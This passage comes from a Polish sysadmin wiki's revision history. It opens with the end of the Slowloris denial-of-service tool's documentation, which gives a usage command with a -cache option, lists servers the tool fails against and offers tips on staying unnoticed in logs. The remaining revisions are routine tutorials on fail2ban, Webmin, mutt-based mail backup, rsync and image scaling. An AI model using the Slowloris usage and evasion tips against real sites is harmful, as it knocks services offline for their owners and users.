Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.

=head3 HTTP Cache Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache

=head1 Issues

Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.

Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.

For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.

Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.

=head1 What is a slow loris?

What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:

http://www.youtube.com/watch?v=rLdQ3UhLoD4

</source>

Tutaj zostało oficjalnie opublikowane [http://ha.ckers.org/slowloris/ Źródło skryptu]

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-09-30T19:22:14Z

Stare:

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-09-30T19:20:38Z

Stare:

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-09-30T19:14:57Z

Stare:

Plik:800px-Slow Loris Female.jpg

2009-09-30T19:13:55Z

Stare: Slow Loris

Slow Loris

Fail2ban

2009-08-27T11:28:42Z

Stare:

Fail2Ban - oprogramowanie służące ochronie systemu informatycznego poprzez blokowaniu ataków typu Brute-Force na najważniejsze usługi systemowe (SSH / FTP).

W wypadku wykrycia zbyt dużej liczby niepowodzeń w logowaniu, fail2ban zablokuje użytkownikowi dostęp do serwera poprzez blokadę na firewallu.

Instalacja

<pre>
apt-get install fail2ban
</pre>

Plik konfiguracyjny:

<pre>
nano /etc/fail2ban/jail.local
</pre>

Dodawanie adresu ip (192.168.0.243) do białej listy
<pre>
ignoreip = 127.0.0.1 192.168.0.243
</pre>
Powyższe adresy będą wykluczone ze sprawdzania.

Czas blokady (w sekundach)
<pre>
bantime = 600
</pre>

'''Wysyłanie logów o "próbie włamania" na adres e-mail.'''

Ustawiamy adres e-mail odbiorcy logów.
<pre>
destemail = xxx@domena.pl
</pre>

Zmieniamy tryb z (samego banowania, na banowanie z logami via email)

Edytujemy wpis
<pre>
action = %(action_)s
</pre>
modyfikując na
<pre>
action = %(action_mwl)s
</pre>

Ilość nieudanych prób logowania definiujemy poprzez
<pre>
maxretry = 6
</pre>
[[Plik:Fail2ban w akcji powiadomienie.png|200px|thumb|right|Fail2ban w akcji (powiadomienie)]]

6 jest liczbą domyślną, i według mojej oceny nie wybraną przypadkowo.
Niektórzy użytkownicy korzystają z zestawu kilku haseł domyślnych, więc zanim uda im się trafić w to "właściwe" mija kilka prób.
Bardziej agresywna polityka typu 2/3 może spotkać się z narzekaniami tych że użytkowników, i koniecznością " ich odblokowywania" lub dodawania do "białej listy".

W związku z powyższym w niektórych wypadkach sugerował bym nawet zwiększenie limitu do 12 prób lecz znaczne zwiększenie czasu blokady.
Zyskujemy wtedy 100% pewność że akcja użytkownika jest faktycznie atakiem, a nie próbą "odgadnięcia swojego hasła".
W takim wypadku nie będziemy musieli nadmiernie ingerować w nasz serwer, w celu odblokowania zapominalskich userów.

Fail2ban

2009-08-27T10:54:24Z

Stare: Utworzył nową stronę „Fail2Ban - oprogramowanie służące ochronie systemu informatycznego poprzez blokowaniu ataków typu Brute-Force na najważniejsze usługi systemowe (SSH / FTP). W w…”

Fail2Ban - oprogramowanie służące ochronie systemu informatycznego poprzez blokowaniu ataków typu Brute-Force na najważniejsze usługi systemowe (SSH / FTP).

W wypadku wykrycia zbyt dużej liczby niepowodzeń w logowaniu, fail2ban zablokuje użytkownikowi dostęp do serwera poprzez blokadę na firewallu.

Instalacja

<pre>
apt-get install fail2ban
</pre>

Plik konfiguracyjny:

<pre>
nano /etc/fail2ban/jail.local
</pre>

Dodawanie adresu ip (192.168.0.243) do białej listy
<pre>
ignoreip = 127.0.0.1 192.168.0.243
</pre>
Powyższe adresy będą wykluczone ze sprawdzania.

Czas blokady (w sekundach)
<pre>
bantime = 600
</pre>

[[Plik:Fail2ban w akcji powiadomienie.png|200px|thumb|right|Fail2ban w akcji (powiadomienie)]]

'''Wysyłanie logów o "próbie włamania" na adres e-mail.'''

Ustawiamy adres e-mail odbiorcy logów.
<pre>
destemail = xxx@domena.pl
</pre>

Zmieniamy tryb z (samego banowania, na banowanie z logami via email)

Edytujemy wpis
<pre>
action = %(action_)s
</pre>
modyfikując na
<pre>
action = %(action_mwl)s
</pre>

Ilość nieudanych prób logowania definiujemy poprzez
<pre>
maxretry = 6
</pre>

6 jest liczbą domyślną, i według mojej oceny nie wybraną przypadkowo.
Niektórzy użytkownicy korzystają z zestawu kilku haseł domyślnych, więc zanim uda im się trafić w to "właściwe" mija kilka prób.
Bardziej agresywna polityka typu 2/3 może spotkać się z narzekaniami tych że użytkowników, i koniecznością " ich odblokowywania" lub dodawania do "białej listy".

W związku z powyższym w niektórych wypadkach sugerował bym nawet zwiększenie limitu do 12 prób lecz znaczne zwiększenie czasu blokady.
Zyskujemy wtedy 100% pewność że akcja użytkownika jest faktycznie atakiem, a nie próbą "odgadnięcia swojego hasła".
W takim wypadku nie będziemy musieli nadmiernie ingerować w nasz serwer, w celu odblokowania zapominalskich userów.

Plik:Fail2ban w akcji powiadomienie.png

2009-08-27T10:43:23Z

Stare: Powiadomienie fail2ban

Powiadomienie fail2ban

Instalacja webmina (webmin)

2009-08-25T08:43:16Z

Stare:

Aby zainstalować najnowszą wersję Webmina.

<pre>
wget http://downloads.sourceforge.net/project/webadmin/webmin/1.480/webmin_1.480_all.deb?use_mirror=dfn
dpkg -i webmin_1.480_all.deb
</pre>

Dostęp możliwy jest na porcie 10000 w połączeniu szyfrowanym SSL.

https://localhost:10000

Ładne wypluwanie (drukowanie) logów na konsolę (tail)

2009-08-25T08:39:46Z

Stare: Utworzył nową stronę „Efekt finalny Aby wyrzucić w dosyć efektowny i co najważniejsze użyteczny sposób logi na konsoli (…”

[[Plik:Wypluwanie logow na konsole tail.png|300px|thumb|right|Efekt finalny]]

Aby wyrzucić w dosyć efektowny i co najważniejsze użyteczny sposób logi na konsoli (polecam SSH), możemy posłużyć się magiczną komendą

<pre>
tail -f /var/log/mail.log
</pre>

Powyższa komenda ma jedną wielką zaletę, plik będzie automatycznie odświeżany, co za tym idzie będziemy mieć wrażenie iż logi są drukowane na nasze żądanie. W połączeniu z SSH w łatwy sposób będziemy mogli skopiować interesujące nas fragmenty.

Plik:Wypluwanie logow na konsole tail.png

2009-08-25T08:35:14Z

Stare:

tail -f /var/mail.log

Plik:Wypluwanie logow na konsole tail.png

2009-08-25T08:34:31Z

Stare: tail -f /var/syslog

tail -f /var/syslog

Mail backup

2009-08-25T08:26:15Z

Stare:

Backup ważnych danych, na zewnętrzny serwer pocztowy.

Instalujemy aplikację odpowiedzialną za wysyłkę wiadomości wraz z załącznikami.
<pre>
apt-get install mutt
</pre>

Testujemy wysyłkę

<pre>
mutt -s "To tylko test" adres@email <tresc.txt
</pre>

Jeżeli chcemy zmienić adres reply-to przeczytaj to:
[[Mutt_zmiana_pola_(reply-to)_dla_wysyłanych_wiadomości|Zmiana adresu odpowiedzi]]

Sprawdzamy pocztę:
[[Grafika:New.png|thumb|Nasza Wiadomość]]

Sprawdzamy czy otrzymaliśmy wiadomość, prawdopodobnie zostanie ona uznana za spam, ale w naszym wypadku nie odgrywa to żadnej roli. Ponieważ nadawca będzie statyczny, tak więc dodamy się do "White Listy".

Test pomyślny, druga próba, tym razem z załącznikiem.

<pre>
mutt -s "To tylko test" -a backup.tar.gz adres@email <tresc.txt
</pre>

Sprawdzamy pocztę
[[Grafika:Screenshot4.png|thumb|Nasza Wiadomość z załącznikiem]]

Otrzymaliśmy wiadomość z naszym plikiem kopii zapasowej.

 
Uwaga: jeżeli zamieżamy wysyłać DUŻE załączniki, trzeba odpowiednio wyedytować plik konfiguracyjny naszego serwera poczty.
W moim wypadku (dystrybucja Ubuntu) postfix.

<pre>
nano /etc/postfix/main.cf
</pre>

Zwiększamy delikatnie limit wiadomości:

<pre>
#mailbox_size_limit = 0
mailbox_size_limit = 30000000000
message_size_limit = 10240000000
</pre>

Powinno wystarczyć :)

----

Jako że jesteśmy w dwudziestym pierwszym wieku, nic nie będziemy robić recznie. Zajmiemy się teraz procesem automatyzacji.

1) Tworzymy ścieżkę gdzie będziemy przechowywac kopię zapasową.

<pre>mkdir /home/administrator/.temp_backup_mail
</pre>

2) przygotowujemy skrypt mail_backup.sh

<pre>
#!/bin/bash
czas=`date`
backup_folder="/home/administrator/.temp_backup_mail"
backup_tresc="/home/administrator/NetBeansProjects"

backup_file="$backup_folder/$(date +%d%m%y).zip"
backup_dane="Kopia zapasowa wykoana "$czas" "

zip -r $backup_file $backup_tresc >$backup_folder/tresc.txt

mutt -s "Kopia zapasowa $czas" -a $backup_file mail@domena.com <$backup_folder/tresc.txt

</pre>

Testujemy :)

<pre>
sh mail_backup.sh
</pre>

Otwieramy pocztę:
[[Grafika:Mailpomyslnie.png|thumb|Załącznik, data, a w treści logi :)]]

 
 
 

Jeżeli wszystko działa
<pre>
cp mail_backup.sh /etc/cron.daily/
</pre>

Jeszcze uprwanienia
<pre>
sudo chmod +x ./mail_backup.sh
</pre>

No i czekamy do rana, żeby zobaczyć swierzutką kopię, na zewnętrznym serwerze :).

Dla paranoików, ustawiamy na koncie pocztowym przekierowanie na drugie. I mamy nasz backup na 2 niezależnych serwerach.

Polecam używać poczty która ma załączniki do 100 mb :)
Ewentualnie, jeżeli ktoś chce, to w pętli for dopisać dzielenie na 10 megowe pliki.

Mutt zmiana pola (reply-to) dla wysyłanych wiadomości

2009-08-25T08:24:05Z

Stare: Utworzył nową stronę „Aby zmienić nagłówek reply-to dla wysyłanych wiadomości przez mutt trzeba przeedytowac jeden plik. ''(w wypadku konta root, należy pominąć /home/ !)'' <pre> n…”

Aby zmienić nagłówek reply-to dla wysyłanych wiadomości przez mutt trzeba przeedytowac jeden plik.

''(w wypadku konta root, należy pominąć /home/ !)''
<pre>
nano /home/`whoami`/.muttrc
</pre>

I dodać treść

<pre>
my_hdr Reply-To: login@domena.gdzie.maja.odpisywac
</pre>

Otwórz folder w terminalu (menu kontekstowe gnome)

2009-08-24T19:35:22Z

Stare:

[[Plik:Ptawy terminal otworz folder.png|200px|thumb|right|Efekt finalny]]
Jedną z najważniejszych opcji w trakcie pracy z systemem linuksowym jest błyskawiczny dostęp do terminalu.

Aby ułatwić sobie zadanie, najlepiej będzie dodać opcje "otwarcia aktualnego folderu" w terminalu, w prawym klawiszu myszy.

Tak jak widoczne po prawej stronie.

Zabawa jest bardzo prosta.

''(w wypadku konta root, należy pominąć /home/ !)''
<pre>
mkdir/home/`whoami`/.gnome2/nautilus-scripts
nano /home/`whoami`/.gnome2/nautilus-scripts/Terminal
</pre>

Dodajemy treść

<source lang="bash">
#!/bin/sh
gnome-terminal
</source>

Oraz ostatecznie uprawnienie nie do uruchamiania.

<pre>
chmod +x /home/`whoami`/.gnome2/nautilus-scripts/Terminal
</pre>

Instalacja webmina

2009-08-24T16:01:43Z

Stare: stronę Instalacja webmina przeniósł do Instalacja webmina (webmin)

#PATRZ [[Instalacja webmina (webmin)]]

Instalacja webmina (webmin)

2009-08-24T16:01:43Z

Stare: stronę Instalacja webmina przeniósł do Instalacja webmina (webmin)

Aby zainstalować najnowszą wersję Webmina.

<pre>
wget http://downloads.sourceforge.net/project/webadmin/webmin/1.480/webmin_1.480_all.deb?use_mirror=dfn
dpkg -i webmin_1.480_all.deb
</pre>

Dostęp możliwy jest na 10000 na połączeniu szyfrowanym SSL.

https://localhost:10000

Jak poprawnie obliczyć zmianę rozdzielczości (skala)

2009-08-23T21:16:02Z

Stare:

Czasami wymagane jest odwołanie do matematyki wyższej, w sytuacji kiedy chcemy napisać funkcję skalującą obrazy (PHP GD).

Aby szachować, tak zwany "aspect ratio" trzeba obliczyć skalę.

Przykładowy obrazek:

*wysokość: 505px
*szerokość: 835px

<pre>
k = 505/835 = 0.6047904
</pre>
(skala aktualnego obrazka)

Nowa skala dla obrazka o szerokości 780px;

<pre>
x = 780 * k = 483.83
</pre>

W zaokrągleniu wysokość wynosi 484px

Taki wzór bardzo łatwo zaimplementować w dowolną bibliotekę graficzną, aby uzyskać zmiany proporcji zdjęć bez niszczenia kształtu.

[[Category:PHP]]

Jak poprawnie obliczyć zmianę rozdzielczości (skala)

2009-08-23T20:58:46Z

Stare:

Czasami wymagane jest odwołanie do matematyki wyższej, w sytuacji kiedy chcemy napisać funkcję skalującą obrazy (PHP GD).

Aby szachować, tak zwany "aspect ratio" trzeba obliczyć skalę.

Przykładowy obrazek:

*wysokość: 505px
*szerokość: 835px

<pre>
k = 505/835 = 0.6047904
</pre>
(skala aktualnego obrazka)

Nowa skala dla obrazka o wysokości 780px;

<pre>
x = 780 * k = 483.83
</pre>

W zaokrągleniu szerokość wynosi 484px

Taki wzór bardzo łatwo zaimplementować w dowolną bibliotekę graficzną, aby uzyskać zmiany proporcji zdjęć bez niszczenia kształtu.

[[Category:PHP]]

Jak poprawnie obliczyć zmianę rozdzielczości (skala)

2009-08-23T20:58:20Z

Stare:

Czasami wymagane jest odwołanie do matematyki wyższej, w sytuacji kiedy chcemy napisać funkcję skalującą obrazy (PHP GD).

Aby szachować, tak zwany "aspect ratio" trzeba obliczyć skalę.

Przykładowy obrazek:

*wysokość: 505px
*szerokość: 835px

<pre>
k = 505/835 = 0.6047904
</pre>
(skala aktualnego obrazka)

Nowa skala dla obrazka o wysokości 780px;

<pre>
x = 780 * k = 483.83
</pre>

W zaokrągleniu szerokość wynosi 484px

Taki wzór bardzo łatwo zaimplementować w dowolną bibliotekę graficzną, aby uzyskać zmiany proporcji zdjęć bez niszczenia kształtu.

Jak poprawnie obliczyć zmianę rozdzielczości (skala)

2009-08-23T20:58:05Z

Stare: Utworzył nową stronę „Czasami wymagane jest odwołanie do matematyki wyższej, w sytuacji kiedy chcemy napisać funkcję skalującą obrazy (PHP GD). Aby szachować, tak zwany "aspect rati…”

Czasami wymagane jest odwołanie do matematyki wyższej, w sytuacji kiedy chcemy napisać funkcję skalującą obrazy (PHP GD).

Aby szachować, tak zwany "aspect ratio" trzeba obliczyć skalę.

Przykładowy obrazek:

*wysokość: 505px
*szerokość: 835px

<pre>
k = 505/835 = 0.6047904
</pre>
(skala aktualnego obrazka)

Nowa skala dla obrazka o wysokości 780px;

<pre>
x = 780 * k = 483.83
</pre>

W zaokrągleniu szerokość wynosi 484px

Taki wzór bardzo łatwo zaimplementować w dowolną bibliotekę graficzną, aby uzyskać zmiany proporcji zdjęć bez niszczenia kształtu.

Rsync

2009-08-23T20:50:02Z

Stare: Utworzył nową stronę „ Backupowanie "/" przez rsync. <pre> rsync --progress --delete -avz -e ssh root@192.168.0.45:/ /media/disk-1/RAIDBACKUP </pre> *'''/media/disk-1/RAIDBACKUP''' - ście…”

Backupowanie "/" przez rsync.

<pre>
rsync --progress --delete -avz -e ssh root@192.168.0.45:/ /media/disk-1/RAIDBACKUP
</pre>

*'''/media/disk-1/RAIDBACKUP''' - ścieżka docelowa
*'''root@192.168.0.45:/''' - użytkownik, serwer, oraz ścieżka źródłowa, w tym wypadku /

Instalacja webmina (webmin)

2009-08-23T15:26:33Z

Stare: Utworzył nową stronę „Aby zainstalować najnowszą wersję Webmina. <pre> wget http://downloads.sourceforge.net/project/webadmin/webmin/1.480/webmin_1.480_all.deb?use_mirror=dfn dpkg -i web…”

Aby zainstalować najnowszą wersję Webmina.

<pre>
wget http://downloads.sourceforge.net/project/webadmin/webmin/1.480/webmin_1.480_all.deb?use_mirror=dfn
dpkg -i webmin_1.480_all.deb
</pre>

Dostęp możliwy jest na 10000 na połączeniu szyfrowanym SSL.

https://localhost:10000